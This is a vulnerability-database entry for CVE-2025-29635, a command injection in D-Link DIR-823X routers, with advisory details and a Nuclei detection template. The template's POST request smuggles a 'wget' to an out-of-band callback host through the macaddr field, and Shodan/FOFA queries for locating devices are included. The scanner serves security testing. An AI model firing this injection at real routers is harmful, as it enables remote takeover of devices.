D-Link DIR-823X set_prohibiting - Command Injection
CVE-2025-29635
Early Release
Description
D-Link DIR-823X 240126 and 240802 contain a command injection caused by sending a POST request to /goform/set_prohibiting, letting an authorized attacker execute arbitrary commands remotely, exploit requires attacker to be authorized.
Severity
High
CVSS Score
7.2
Exploit Probability
87%
Affected Product
dir-823x_firmware
Published Date
June 17, 2026
Template Author
pussycat0x
CVE-2025-29635.yaml
id: CVE-2025-29635
info:
name: D-Link DIR-823X set_prohibiting - Command Injection
author: pussycat0x
severity: high
description: |
D-Link DIR-823X 240126 and 240802 contain a command injection caused by sending a POST request to /goform/set_prohibiting, letting an authorized attacker execute arbitrary commands remotely, exploit requires attacker to be authorized.
impact: |
Attackers can execute arbitrary commands on the device remotely, potentially leading to full device compromise.
remediation: |
Update to the latest firmware version provided by D-Link or contact vendor for patches.
reference:
- https://securityaffairs.com/191135/malware/mirai-botnet-exploits-cve-2025-29635-to-target-legacy-d-link-routers.html
- https://github.com/D-Link-SA/CVE-2025-29635/blob/main/CVE-2025-29635.md
- https://nvd.nist.gov/vuln/detail/CVE-2025-29635
classification:
cvss-score: 7.2
cve-id: CVE-2025-29635
epss-score: 0.87239
epss-percentile: 0.99728
cwe-id: CWE-78
metadata:
verified: false
max-request: 1
vendor: dlink
product: dir-823x_firmware
shodan-query: title:"D-Link"
fofa-query: title="DIR-823X"
tags: cve,cve2025,dlink,rce,kev,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "contains(to_lower(body), 'dir-823')"
internal: true
- raw:
- |
POST /goform/set_prohibiting HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
macaddr=||wget http://{{interactsh-url}}||&token=00000000000000000000000000000000
matchers:
type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "status_code == 200"
condition: and
7.2Score
CVSS Metrics
CVE ID:
cve-2025-29635
CWE ID:
cwe-78
Remediation Steps
Update to the latest firmware version provided by D-Link or contact vendor for patches.